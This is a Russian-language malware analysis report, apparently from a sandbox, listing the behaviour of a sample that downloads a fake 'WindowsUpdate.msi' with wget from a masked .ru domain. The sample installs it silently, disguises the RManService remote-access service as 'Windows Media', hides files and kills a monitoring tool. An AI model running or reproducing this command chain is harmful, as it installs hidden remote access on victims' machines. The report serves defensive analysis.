Техническая информация
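Запуск процессов (командные строки). Строки с sc.exe переводят службу RManService на автозапуск и задают ей отображаемое имя «Windows Media» и описание, а taskkill.exe принудительно завершает процесс anvir.exe:
- '%TEMP%\7ZipSfx.000\wget.exe' http://he##2.ru/2/WindowsUpdate.msi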
- '<SYSTEM32>\reg.exe' delete "HKCR\Installer\Products\C4EFB40B11F78D94DAEF6897938D68AF" /f
- '<SYSTEM32>\msiexec.exe' /I "WindowsUpdate.msi" /qn
- '<SYSTEM32>\ping.exe' 127.0.0.1
- '<SYSTEM32>\attrib.exe' +s +h +r "<SYSTEM32>\hemp"
- '<SYSTEM32>\sc.exe' config RManService start= "auto"
- '<SYSTEM32>\sc.exe' description RManService "Windows Media alloy media files downloads"
- '<SYSTEM32>\sc.exe' config RManService displayname= "Windows Media"
- '<SYSTEM32>\taskkill.exe' /f /im anvir.exe
- '<SYSTEM32>\wscript.exe' "%TEMP%\7ZipSfx.000\error.vbs"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\msiexec.exe' /x {B04BFE4C-7F11-49D8-ADFE-867939D886FA} /qn REBOOT=ReallySuppress
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
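Файлы в каталоге %TEMP%\7ZipSfx.000. Ниже идут два списка с одним и тем же набором файлов, но без подписей; вероятно, первый список — созданные файлы, второй — удалённые (уточнить по исходному отчёту):
- %TEMP%\7ZipSfx.000\wget.exe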
- %TEMP%\7ZipSfx.000\WindowsUpdate.msi
- %TEMP%\7ZipSfx.000\install.cmd
- %TEMP%\7ZipSfx.000\error.vbs
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\WindowsUpdate.msi
- %TEMP%\7ZipSfx.000\error.vbs
- %TEMP%\7ZipSfx.000\install.cmd
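Сетевая активность (подключение, HTTP-запрос и DNS-запрос; доменное имя в отчёте частично скрыто символами ##):
- 'he##2.ru':80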
- he##2.ru/2/WindowsUpdate.msi
- DNS ASK he##2.ru
Окна (класс и заголовок; вероятно, окна, которые ищет образец, — уточнить по исходному отчёту):
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''